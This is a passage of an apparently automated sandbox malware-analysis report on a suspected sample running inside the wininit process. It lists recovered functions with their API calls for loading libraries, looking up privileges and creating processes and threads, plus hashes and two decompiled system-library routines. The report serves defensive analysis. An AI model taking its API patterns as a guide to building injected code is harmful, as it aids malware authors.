                                                control_flow_graph 294 e7280-e72ad call fa140 call fad20 299 e72b3-e72ca call f3e50 294->299 300 e72ae call e9b40 294->300 304 e72fe-e7302 299->304 305 e72cc-e72de PostThreadMessageW 299->305 300->299 307 e72fd 305->307 308 e72e0-e72fb call e92a0 PostThreadMessageW 305->308 307->304 308->307
                                                APIs
                                                • PostThreadMessageW.USER32(0065002E,00000111,00000000,00000000,00000000), ref: 000E72DA
                                                • PostThreadMessageW.USER32(0065002E,00008003,00000000,?,00000000), ref: 000E72FB
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.691708361.00000000000E0000.00000040.00020000.sdmp, Offset: 000E0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_7_2_e0000_wininit.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: MessagePostThread
                                                • String ID:
                                                • API String ID: 1836367815-0
                                                • Opcode ID: f900fcda8f6669b1d0c8376568bef9b361ab5ffbce75bdd02eeca6d8b53874f7
                                                • Instruction ID: 2c4900cad46d0c7ea10aecc7d2920eb512e41389f28aaf0771d951db82e7b716
                                                • Opcode Fuzzy Hash: f900fcda8f6669b1d0c8376568bef9b361ab5ffbce75bdd02eeca6d8b53874f7
                                                • Instruction Fuzzy Hash: 6A01F271A8022D7BEB20A6959C03FFE776C5B01B50F040018FF08BA1C2EAD46A0682F6
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 000F89F6, Relevance: 1.6, APIs: 1, Instructions: 54COMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 506 f89f6-f89ff 507 f8a56-f8a6a call f91e0 506->507 508 f8a01-f8a40 call f91e0 506->508 511 f8a6f-f8a84 LookupPrivilegeValueW 507->511
                                                APIs
                                                • LookupPrivilegeValueW.ADVAPI32(00000000,?,000ECFC2,000ECFC2,?,00000000,?,?), ref: 000F8A80
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.691708361.00000000000E0000.00000040.00020000.sdmp, Offset: 000E0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_7_2_e0000_wininit.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: LookupPrivilegeValue
                                                • String ID:
                                                • API String ID: 3899507212-0
                                                • Opcode ID: 4b579ca39a682b8107cbb67132f54e9b98f241f21df0ce00df381fb961ee1723
                                                • Instruction ID: 2e8a7ebfa09781db46d2f93618ea64a990ad30908b102ba6b7a38c3b03a24b2a
                                                • Opcode Fuzzy Hash: 4b579ca39a682b8107cbb67132f54e9b98f241f21df0ce00df381fb961ee1723
                                                • Instruction Fuzzy Hash: A4015BB5200208AFDB14DF58CC84EEB37A9EF88350F058154FA0C67642C930E914CBB1
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 000E9B40, Relevance: 1.5, APIs: 1, Instructions: 48libraryloaderCOMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 514 e9b40-e9b69 call faf70 517 e9b6f-e9b7d call fb390 514->517 518 e9b6b-e9b6e 514->518 521 e9b7f-e9b8a call fb610 517->521 522 e9b8d-e9b9e call f9720 517->522 521->522 527 e9bb7-e9bba 522->527 528 e9ba0-e9bb4 LdrLoadDll 522->528 528->527
                                                APIs
                                                • LdrLoadDll.NTDLL(00000000,00000000,00000003,?), ref: 000E9BB2
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.691708361.00000000000E0000.00000040.00020000.sdmp, Offset: 000E0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_7_2_e0000_wininit.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: Load
                                                • String ID:
                                                • API String ID: 2234796835-0
                                                • Opcode ID: 2b74e1a6cb83c5850b3107d2340027d2c92311fd596683a21eeb75245e32f392
                                                • Instruction ID: fd7663460fafbec25dd2d72108e02b746e3107953828ca5e20ac3cc0582691a7
                                                • Opcode Fuzzy Hash: 2b74e1a6cb83c5850b3107d2340027d2c92311fd596683a21eeb75245e32f392
                                                • Instruction Fuzzy Hash: B10140B5D0020DABDF10DAA5DD42FEDB3B89B54304F004195AA08A7642F630EB048B91
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 000F8960, Relevance: 1.5, APIs: 1, Instructions: 42processCOMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 529 f8960-f89b8 call f91e0 CreateProcessInternalW
                                                APIs
                                                • CreateProcessInternalW.KERNEL32(?,00000000,?,?,00000000,00000000,?,?,?,00000000,00000000,?,?,00000000,?,00000000), ref: 000F89B4
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.691708361.00000000000E0000.00000040.00020000.sdmp, Offset: 000E0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_7_2_e0000_wininit.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: CreateInternalProcess
                                                • String ID:
                                                • API String ID: 2186235152-0
                                                • Opcode ID: 91c10d5b09b6f5ff7ee6d1e22534128eefdcfa4a5b7191d55d386dbf4554461c
                                                • Instruction ID: a98013e4001674ef6cb3fc37e09322e1101dc8b4781e11d86358595ff1999473
                                                • Opcode Fuzzy Hash: 91c10d5b09b6f5ff7ee6d1e22534128eefdcfa4a5b7191d55d386dbf4554461c
                                                • Instruction Fuzzy Hash: 1701AFB2214108ABCB54DF89DC80EEB77ADAF8C754F158258FA0D97241C630E851CBA4
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 000F7423, Relevance: 1.5, APIs: 1, Instructions: 37threadCOMMON
                                                Download Yara Rule
                                                APIs
                                                • CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000,?,?,000ECCF0,?,?), ref: 000F746C
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.691708361.00000000000E0000.00000040.00020000.sdmp, Offset: 000E0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_7_2_e0000_wininit.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: CreateThread
                                                • String ID:
                                                • API String ID: 2422867632-0
                                                • Opcode ID: 59fb06d1aa1c136e8b86696eddacef487bb660dd6014ac6a24646caa89fd20f8
                                                • Instruction ID: 20900e2d5a05a5edf078526415f6d0cf102a67a7e5003a6cf37f1f31c8e95670
                                                • Opcode Fuzzy Hash: 59fb06d1aa1c136e8b86696eddacef487bb660dd6014ac6a24646caa89fd20f8
                                                • Instruction Fuzzy Hash: 78F0E5723806143AE33169688C02FE77A9D8B85B15F544029F79DEF6C3DAD5F84282D4
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 000F7430, Relevance: 1.5, APIs: 1, Instructions: 36threadCOMMON
                                                Download Yara Rule
                                                APIs
                                                • CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000,?,?,000ECCF0,?,?), ref: 000F746C
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.691708361.00000000000E0000.00000040.00020000.sdmp, Offset: 000E0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_7_2_e0000_wininit.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: CreateThread
                                                • String ID:
                                                • API String ID: 2422867632-0
                                                • Opcode ID: 1b4df3ceebff196fdae77df3e17a26960dadbdf24d0045284d4eb347b77965e8
                                                • Instruction ID: e8bc1fbcc3ff186e4d2005aea7192b3a89181e99dcbca79ad9b412ac54432941
                                                • Opcode Fuzzy Hash: 1b4df3ceebff196fdae77df3e17a26960dadbdf24d0045284d4eb347b77965e8
                                                • Instruction Fuzzy Hash: ABE06D333802083AE22065A99C02FE7B69C8B81B24F540026FB4DEA6C2D595F90152A9
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 000F8A41, Relevance: 1.5, APIs: 1, Instructions: 28COMMON
                                                Download Yara Rule
                                                APIs
                                                • LookupPrivilegeValueW.ADVAPI32(00000000,?,000ECFC2,000ECFC2,?,00000000,?,?), ref: 000F8A80
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.691708361.00000000000E0000.00000040.00020000.sdmp, Offset: 000E0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_7_2_e0000_wininit.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: LookupPrivilegeValue
                                                • String ID:
                                                • API String ID: 3899507212-0
                                                • Opcode ID: 47e8e0e523213e13c9b214feb9b4f8d069eb38ca25052b67dab34f63c81d37f4
                                                • Instruction ID: 2bc0d23e6c76350f7291a99afbaa63617476d198c875a22e22edbb992ecdd1fe
                                                • Opcode Fuzzy Hash: 47e8e0e523213e13c9b214feb9b4f8d069eb38ca25052b67dab34f63c81d37f4
                                                • Instruction Fuzzy Hash: 5AE0E5752041046FDB00DF69DC85E977B69EF81250F00465EFC8957106C534B405CBB0
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 000F88B0, Relevance: 1.5, APIs: 1, Instructions: 24memoryCOMMON
                                                Download Yara Rule
                                                APIs
                                                • RtlAllocateHeap.NTDLL(000F3536,?,000F3CAF,000F3CAF,?,000F3536,?,?,?,?,?,00000000,00000000,?), ref: 000F88DD
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.691708361.00000000000E0000.00000040.00020000.sdmp, Offset: 000E0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_7_2_e0000_wininit.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: AllocateHeap
                                                • String ID:
                                                • API String ID: 1279760036-0
                                                • Opcode ID: ecb7fbf7fbf697e7ed6b19bb654fc0845e00bd12648aab82589a03cf581b1705
                                                • Instruction ID: 4f72fa366b37d832a1a8319f864fa93d742f6f12058a8c0faead5da3c4e9727e
                                                • Opcode Fuzzy Hash: ecb7fbf7fbf697e7ed6b19bb654fc0845e00bd12648aab82589a03cf581b1705
                                                • Instruction Fuzzy Hash: 38E012B1200208ABDB14EF99CC45EA777ACAF88650F118558FE085B242C630F910CAB0
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 000F8A50, Relevance: 1.5, APIs: 1, Instructions: 24COMMON
                                                Download Yara Rule
                                                APIs
                                                • LookupPrivilegeValueW.ADVAPI32(00000000,?,000ECFC2,000ECFC2,?,00000000,?,?), ref: 000F8A80
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.691708361.00000000000E0000.00000040.00020000.sdmp, Offset: 000E0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_7_2_e0000_wininit.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: LookupPrivilegeValue
                                                • String ID:
                                                • API String ID: 3899507212-0
                                                • Opcode ID: c524c4dcdeb286be68a002add1a356f71d86b8c938967e6280f3f61150ebef6a
                                                • Instruction ID: f2fe83c76d1b5d9a072489afcb4d2cc7034c7e37b7a0b451402f1adf97a2441e
                                                • Opcode Fuzzy Hash: c524c4dcdeb286be68a002add1a356f71d86b8c938967e6280f3f61150ebef6a
                                                • Instruction Fuzzy Hash: 86E01AB12002086BDB10EF49CC85EE737ADAF88650F018164FE0857242C930F910CBF5
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 000ED427, Relevance: 1.5, APIs: 1, Instructions: 22COMMON
                                                Download Yara Rule
                                                APIs
                                                • SetErrorMode.KERNELBASE(00008003,?,?,000E7C83,?), ref: 000ED45B
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.691708361.00000000000E0000.00000040.00020000.sdmp, Offset: 000E0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_7_2_e0000_wininit.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: ErrorMode
                                                • String ID:
                                                • API String ID: 2340568224-0
                                                • Opcode ID: 3fb9cf6ab301c5a85005ea8dfb1daeeff85bdba07a826920891839b0a0c7d5c8
                                                • Instruction ID: cce71db6f245c93cc236357af817c8f2d4033a9ca37136994f42b97e84916469
                                                • Opcode Fuzzy Hash: 3fb9cf6ab301c5a85005ea8dfb1daeeff85bdba07a826920891839b0a0c7d5c8
                                                • Instruction Fuzzy Hash: 18E0C2766402063FEB10EAB49C03FA677959F51794F0D40A8F549EB2C3DA60E1018610
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 000ED430, Relevance: 1.5, APIs: 1, Instructions: 19COMMON
                                                Download Yara Rule
                                                APIs
                                                • SetErrorMode.KERNELBASE(00008003,?,?,000E7C83,?), ref: 000ED45B
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.691708361.00000000000E0000.00000040.00020000.sdmp, Offset: 000E0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_7_2_e0000_wininit.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: ErrorMode
                                                • String ID:
                                                • API String ID: 2340568224-0
                                                • Opcode ID: b859b7cae5d840821570f7fd72460b0c7ff461e09dfcff46a89307c648adf87c
                                                • Instruction ID: e735f35fc90ee8bd46d8646e4cbf6d4cb715a86d2e0baa3f0098a9ad89a92241
                                                • Opcode Fuzzy Hash: b859b7cae5d840821570f7fd72460b0c7ff461e09dfcff46a89307c648adf87c
                                                • Instruction Fuzzy Hash: BED0A7717503083BE710FAA49C03F6633CC9F55B54F494064FA48E73C3D960F5008161
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Non-executed Functions

                                                Function 02548788, Relevance: 19.7, APIs: 6, Strings: 5, Instructions: 431COMMON
                                                Download Yara Rule
                                                C-Code - Quality: 94%
                                                			E02548788(signed int __ecx, void* __edx, signed int _a4) {
				signed int _v8;
				short* _v12;
				void* _v16;
				signed int _v20;
				char _v24;
				signed int _v28;
				signed int _v32;
				char _v36;
				signed int _v40;
				char _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				char _v68;
				void* _t216;
				intOrPtr _t231;
				short* _t235;
				intOrPtr _t257;
				short* _t261;
				intOrPtr _t284;
				intOrPtr _t288;
				void* _t314;
				signed int _t318;
				short* _t319;
				intOrPtr _t321;
				void* _t328;
				void* _t329;
				char* _t332;
				signed int _t333;
				signed int* _t334;
				void* _t335;
				void* _t338;
				void* _t339;

				_t328 = __edx;
				_t322 = __ecx;
				_t318 = 0;
				_t334 = _a4;
				_v8 = 0;
				_v28 = 0;
				_v48 = 0;
				_v20 = 0;
				_v40 = 0;
				_v32 = 0;
				_v52 = 0;
				if(_t334 == 0) {
					_t329 = 0xc000000d;
					L49:
					_t334[0x11] = _v56;
					 *_t334 =  *_t334 | 0x00000800;
					_t334[0x12] = _v60;
					_t334[0x13] = _v28;
					_t334[0x17] = _v20;
					_t334[0x16] = _v48;
					_t334[0x18] = _v40;
					_t334[0x14] = _v32;
					_t334[0x15] = _v52;
					return _t329;
				}
				_v56 = 0;
				if(E02548460(__ecx, L"WindowsExcludedProcs",  &_v44,  &_v24,  &_v8) >= 0) {
					_v56 = 1;
					if(_v8 != 0) {
						_t207 = E0252E025(__ecx,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), 0, _v8);
					}
					_push(1);
					_v8 = _t318;
					E0254718A(_t207);
					_t335 = _t335 + 4;
				}
				_v60 = _v60 | 0xffffffff;
				if(E02548460(_t322, L"Kernel-MUI-Number-Allowed",  &_v44,  &_v24,  &_v8) >= 0) {
					_t333 =  *_v8;
					_v60 = _t333;
					_t314 = E0252E025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v8);
					_push(_t333);
					_v8 = _t318;
					E0254718A(_t314);
					_t335 = _t335 + 4;
				}
				_t216 = E02548460(_t322, L"Kernel-MUI-Language-Allowed",  &_v44,  &_v24,  &_v8);
				_t332 = ";";
				if(_t216 < 0) {
					L17:
					if(E02548460(_t322, L"Kernel-MUI-Language-Disallowed",  &_v44,  &_v24,  &_v8) < 0) {
						L30:
						if(E02548460(_t322, L"Kernel-MUI-Language-SKU",  &_v44,  &_v24,  &_v8) < 0) {
							L46:
							_t329 = 0;
							L47:
							if(_v8 != _t318) {
								E0252E025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v8);
							}
							if(_v28 != _t318) {
								if(_v20 != _t318) {
									E0252E025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v20);
									_v20 = _t318;
									_v40 = _t318;
								}
							}
							goto L49;
						}
						_t231 = _v24;
						_t322 = _t231 + 4;
						_push(_t231);
						_v52 = _t322;
						E0254718A(_t231);
						if(_t322 == _t318) {
							_v32 = _t318;
						} else {
							_v32 = E0252E0C6( *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), 8, _t322);
						}
						if(_v32 == _t318) {
							_v52 = _t318;
							L58:
							_t329 = 0xc0000017;
							goto L47;
						} else {
							E02522340(_v32, _v8, _v24);
							_v16 = _v32;
							_a4 = _t318;
							_t235 = E0253E679(_v32, _t332);
							while(1) {
								_t319 = _t235;
								if(_t319 == 0) {
									break;
								}
								 *_t319 = 0;
								_t321 = _t319 + 2;
								E0252E2A8(_t322,  &_v68, _v16);
								if(E02545553(_t328,  &_v68,  &_v36) != 0) {
									_a4 = _a4 + 1;
								}
								_v16 = _t321;
								_t235 = E0253E679(_t321, _t332);
								_pop(_t322);
							}
							_t236 = _v16;
							if( *_v16 != _t319) {
								E0252E2A8(_t322,  &_v68, _t236);
								if(E02545553(_t328,  &_v68,  &_v36) != 0) {
									_a4 = _a4 + 1;
								}
							}
							if(_a4 == 0) {
								E0252E025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), 0, _v32);
								_v52 = _v52 & 0x00000000;
								_v32 = _v32 & 0x00000000;
							}
							if(_v8 != 0) {
								E0252E025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), 0, _v8);
							}
							_v8 = _v8 & 0x00000000;
							_t318 = 0;
							goto L46;
						}
					}
					_t257 = _v24;
					_t322 = _t257 + 4;
					_push(_t257);
					_v40 = _t322;
					E0254718A(_t257);
					_t338 = _t335 + 4;
					if(_t322 == _t318) {
						_v20 = _t318;
					} else {
						_v20 = E0252E0C6( *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), 8, _t322);
					}
					if(_v20 == _t318) {
						_v40 = _t318;
						goto L58;
					} else {
						E02522340(_v20, _v8, _v24);
						_v16 = _v20;
						_a4 = _t318;
						_t261 = E0253E679(_v20, _t332);
						_t335 = _t338 + 0x14;
						while(1) {
							_v12 = _t261;
							if(_t261 == _t318) {
								break;
							}
							_v12 = _v12 + 2;
							 *_v12 = 0;
							E0252E2A8(_v12,  &_v68, _v16);
							if(E02545553(_t328,  &_v68,  &_v36) != 0) {
								_a4 = _a4 + 1;
							}
							_v16 = _v12;
							_t261 = E0253E679(_v12, _t332);
							_pop(_t322);
						}
						_t269 = _v16;
						if( *_v16 != _t318) {
							E0252E2A8(_t322,  &_v68, _t269);
							if(E02545553(_t328,  &_v68,  &_v36) != 0) {
								_a4 = _a4 + 1;
							}
						}
						if(_a4 == _t318) {
							E0252E025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v20);
							_v40 = _t318;
							_v20 = _t318;
						}
						if(_v8 != _t318) {
							E0252E025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v8);
						}
						_v8 = _t318;
						goto L30;
					}
				}
				_t284 = _v24;
				_t322 = _t284 + 4;
				_push(_t284);
				_v48 = _t322;
				E0254718A(_t284);
				_t339 = _t335 + 4;
				if(_t322 == _t318) {
					_v28 = _t318;
				} else {
					_v28 = E0252E0C6( *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), 8, _t322);
				}
				if(_v28 == _t318) {
					_v48 = _t318;
					goto L58;
				} else {
					E02522340(_v28, _v8, _v24);
					_v16 = _v28;
					_a4 = _t318;
					_t288 = E0253E679(_v28, _t332);
					_t335 = _t339 + 0x14;
					while(1) {
						_v12 = _t288;
						if(_t288 == _t318) {
							break;
						}
						_v12 = _v12 + 2;
						 *_v12 = 0;
						E0252E2A8(_v12,  &_v68, _v16);
						if(E02545553(_t328,  &_v68,  &_v36) != 0) {
							_a4 = _a4 + 1;
						}
						_v16 = _v12;
						_t288 = E0253E679(_v12, _t332);
						_pop(_t322);
					}
					_t296 = _v16;
					if( *_v16 != _t318) {
						E0252E2A8(_t322,  &_v68, _t296);
						if(E02545553(_t328,  &_v68,  &_v36) != 0) {
							_a4 = _a4 + 1;
						}
					}
					if(_a4 == _t318) {
						E0252E025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v28);
						_v48 = _t318;
						_v28 = _t318;
					}
					if(_v8 != _t318) {
						E0252E025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v8);
					}
					_v8 = _t318;
					goto L17;
				}
			}





































                                                0x02548788
                                                0x02548788
                                                0x02548791
                                                0x02548794
                                                0x02548798
                                                0x0254879b
                                                0x0254879e
                                                0x025487a1
                                                0x025487a4
                                                0x025487a7
                                                0x025487aa
                                                0x025487af
                                                0x02591ad3
                                                0x02548b0a
                                                0x02548b0d
                                                0x02548b13
                                                0x02548b19
                                                0x02548b1f
                                                0x02548b25
                                                0x02548b2b
                                                0x02548b31
                                                0x02548b37
                                                0x02548b3d
                                                0x02548b46
                                                0x02548b46
                                                0x025487c6
                                                0x025487d0
                                                0x02591ae0
                                                0x02591ae6
                                                0x02591af8
                                                0x02591af8
                                                0x02591afd
                                                0x02591afe
                                                0x02591b01
                                                0x02591b06
                                                0x02591b06
                                                0x025487d6
                                                0x025487f2
                                                0x025487f7
                                                0x02548807
                                                0x0254880a
                                                0x0254880f
                                                0x02548810
                                                0x02548813
                                                0x02548818
                                                0x02548818
                                                0x0254882c
                                                0x02548831
                                                0x02548838
                                                0x02548908
                                                0x02548920
                                                0x025489f0
                                                0x02548a08
                                                0x02548af6
                                                0x02548af6
                                                0x02548af8
                                                0x02548afb
                                                0x02591beb
                                                0x02591beb
                                                0x02548b04
                                                0x02591bf8
                                                0x02591c0e
                                                0x02591c13
                                                0x02591c16
                                                0x02591c16
                                                0x02591bf8
                                                0x00000000
                                                0x02548b04
                                                0x02548a0e
                                                0x02548a11
                                                0x02548a14
                                                0x02548a15
                                                0x02548a18
                                                0x02548a22
                                                0x02548b59
                                                0x02548a28
                                                0x02548a3c
                                                0x02548a3c
                                                0x02548a42
                                                0x02591bb0
                                                0x02591b11
                                                0x02591b11
                                                0x00000000
                                                0x02548a48
                                                0x02548a51
                                                0x02548a5b
                                                0x02548a5e
                                                0x02548a61
                                                0x02548a69
                                                0x02548a69
                                                0x02548a6d
                                                0x00000000
                                                0x00000000
                                                0x02548a74
                                                0x02548a7c
                                                0x02548a7d
                                                0x02548a91
                                                0x02548a93
                                                0x02548a93
                                                0x02548a98
                                                0x02548a9b
                                                0x02548aa1
                                                0x02548aa1
                                                0x02548aa4
                                                0x02548aaa
                                                0x02548ab1
                                                0x02548ac5
                                                0x02548ac7
                                                0x02548ac7
                                                0x02548ac5
                                                0x02548ace
                                                0x02591bc9
                                                0x02591bce
                                                0x02591bd2
                                                0x02591bd2
                                                0x02548ad8
                                                0x02548aeb
                                                0x02548aeb
                                                0x02548af0
                                                0x02548af4
                                                0x00000000
                                                0x02548af4
                                                0x02548a42
                                                0x02548926
                                                0x02548929
                                                0x0254892c
                                                0x0254892d
                                                0x02548930
                                                0x02548935
                                                0x0254893a
                                                0x02548b51
                                                0x02548940
                                                0x02548954
                                                0x02548954
                                                0x0254895a
                                                0x02591b63
                                                0x00000000
                                                0x02548960
                                                0x02548969
                                                0x02548973
                                                0x02548976
                                                0x02548979
                                                0x0254897e
                                                0x02548981
                                                0x02548981
                                                0x02548986
                                                0x00000000
                                                0x00000000
                                                0x02591b6e
                                                0x02591b74
                                                0x02591b7b
                                                0x02591b8f
                                                0x02591b91
                                                0x02591b91
                                                0x02591b99
                                                0x02591b9c
                                                0x02591ba2
                                                0x02591ba2
                                                0x0254898c
                                                0x02548992
                                                0x02548999
                                                0x025489ad
                                                0x02591ba8
                                                0x02591ba8
                                                0x025489ad
                                                0x025489b6
                                                0x025489c8
                                                0x025489cd
                                                0x025489d0
                                                0x025489d0
                                                0x025489d6
                                                0x025489e8
                                                0x025489e8
                                                0x025489ed
                                                0x00000000
                                                0x025489ed
                                                0x0254895a
                                                0x0254883e
                                                0x02548841
                                                0x02548844
                                                0x02548845
                                                0x02548848
                                                0x0254884d
                                                0x02548852
                                                0x02548b49
                                                0x02548858
                                                0x0254886c
                                                0x0254886c
                                                0x02548872
                                                0x02591b0e
                                                0x00000000
                                                0x02548878
                                                0x02548881
                                                0x0254888b
                                                0x0254888e
                                                0x02548891
                                                0x02548896
                                                0x02548899
                                                0x02548899
                                                0x0254889e
                                                0x00000000
                                                0x00000000
                                                0x02591b21
                                                0x02591b27
                                                0x02591b2e
                                                0x02591b42
                                                0x02591b44
                                                0x02591b44
                                                0x02591b4c
                                                0x02591b4f
                                                0x02591b55
                                                0x02591b55
                                                0x025488a4
                                                0x025488aa
                                                0x025488b1
                                                0x025488c5
                                                0x02591b5b
                                                0x02591b5b
                                                0x025488c5
                                                0x025488ce
                                                0x025488e0
                                                0x025488e5
                                                0x025488e8
                                                0x025488e8
                                                0x025488ee
                                                0x02548900
                                                0x02548900
                                                0x02548905
                                                0x00000000
                                                0x02548905

                                                APIs
                                                Strings
                                                • WindowsExcludedProcs, xrefs: 025487C1
                                                • Kernel-MUI-Language-SKU, xrefs: 025489FC
                                                • Kernel-MUI-Language-Disallowed, xrefs: 02548914
                                                • Kernel-MUI-Language-Allowed, xrefs: 02548827
                                                • Kernel-MUI-Number-Allowed, xrefs: 025487E6
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.692498053.0000000002510000.00000040.00000001.sdmp, Offset: 02500000, based on PE: true
                                                • Associated: 00000007.00000002.692491544.0000000002500000.00000040.00000001.sdmp Download File
                                                • Associated: 00000007.00000002.692568531.00000000025F0000.00000040.00000001.sdmp Download File
                                                • Associated: 00000007.00000002.692576573.0000000002600000.00000040.00000001.sdmp Download File
                                                • Associated: 00000007.00000002.692583760.0000000002604000.00000040.00000001.sdmp Download File
                                                • Associated: 00000007.00000002.692590055.0000000002607000.00000040.00000001.sdmp Download File
                                                • Associated: 00000007.00000002.692596321.0000000002610000.00000040.00000001.sdmp Download File
                                                • Associated: 00000007.00000002.692632305.0000000002670000.00000040.00000001.sdmp Download File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_7_2_2500000_wininit.jbxd
                                                Similarity
                                                • API ID: _wcspbrk
                                                • String ID: Kernel-MUI-Language-Allowed$Kernel-MUI-Language-Disallowed$Kernel-MUI-Language-SKU$Kernel-MUI-Number-Allowed$WindowsExcludedProcs
                                                • API String ID: 402402107-258546922
                                                • Opcode ID: b309d1b2f09ed263c847303a027eecc8ace908df801b6c8165128286a48551a4
                                                • Instruction ID: 8a1d2e745bdadb93ff103b3b5c7682807e19f8da41f8812dba7d1e03305f659d
                                                • Opcode Fuzzy Hash: b309d1b2f09ed263c847303a027eecc8ace908df801b6c8165128286a48551a4
                                                • Instruction Fuzzy Hash: 92F1FAB2D0021AEFCF11DF95C9849EEBBBAFF48308F14446AE505A7250EB34AA45DF54
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 025613CB, Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 195COMMON
                                                Download Yara Rule
                                                C-Code - Quality: 38%
                                                			E025613CB(intOrPtr* _a4, intOrPtr _a8) {
				char _v8;
				intOrPtr _v12;
				intOrPtr* _v16;
				intOrPtr _v20;
				char _v24;
				intOrPtr _t71;
				signed int _t78;
				signed int _t86;
				char _t90;
				signed int _t91;
				signed int _t96;
				intOrPtr _t108;
				signed int _t114;
				void* _t115;
				intOrPtr _t128;
				intOrPtr* _t129;
				void* _t130;

				_t129 = _a4;
				_t128 = _a8;
				_t116 = 0;
				_t71 = _t128 + 0x5c;
				_v8 = 8;
				_v20 = _t71;
				if( *_t129 == 0) {
					if( *((intOrPtr*)(_t129 + 2)) != 0 ||  *((intOrPtr*)(_t129 + 4)) != 0 ||  *((intOrPtr*)(_t129 + 6)) != 0 ||  *(_t129 + 0xc) == 0) {
						goto L5;
					} else {
						_t96 =  *(_t129 + 8) & 0x0000ffff;
						if(_t96 != 0) {
							L38:
							if(_t96 != 0xffff ||  *(_t129 + 0xa) != _t116) {
								goto L5;
							} else {
								_push( *(_t129 + 0xf) & 0x000000ff);
								_push( *(_t129 + 0xe) & 0x000000ff);
								_push( *(_t129 + 0xd) & 0x000000ff);
								_t86 = E02557707(_t128, _t71 - _t128 >> 1, L"::ffff:0:%u.%u.%u.%u",  *(_t129 + 0xc) & 0x000000ff);
								L36:
								return _t128 + _t86 * 2;
							}
						}
						_t114 =  *(_t129 + 0xa) & 0x0000ffff;
						if(_t114 == 0) {
							L33:
							_t115 = 0x2522926;
							L35:
							_push( *(_t129 + 0xf) & 0x000000ff);
							_push( *(_t129 + 0xe) & 0x000000ff);
							_push( *(_t129 + 0xd) & 0x000000ff);
							_push( *(_t129 + 0xc) & 0x000000ff);
